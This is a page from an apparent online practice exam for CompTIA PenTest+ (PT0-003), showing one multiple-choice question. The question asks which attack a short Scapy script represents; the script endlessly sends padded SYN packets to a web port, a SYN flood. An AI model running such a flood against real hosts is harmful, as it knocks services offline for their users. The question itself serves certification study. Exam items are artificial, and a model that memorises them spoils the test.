PT0-003 Web TestEngine demo

Exit VCEDump PT0-003 CompTIA PenTest+
Question 62 of 71
0% complete
Q62 Single choice

A penetration tester is authorized to perform a DoS attack against a host on a network.

Given the following input:

ip = IP("192.168.50.2")
tcp = TCP(sport=RandShort(), dport=80, flags="S")
raw = RAW(b"X"*1024)
p = ip/tcp/raw
send(p, loop=1, verbose=0)

Which of the following attack types is most likely being used in the test?

Sign in to mark questions

Sign in to save marked questions and return to this demo.

Sign in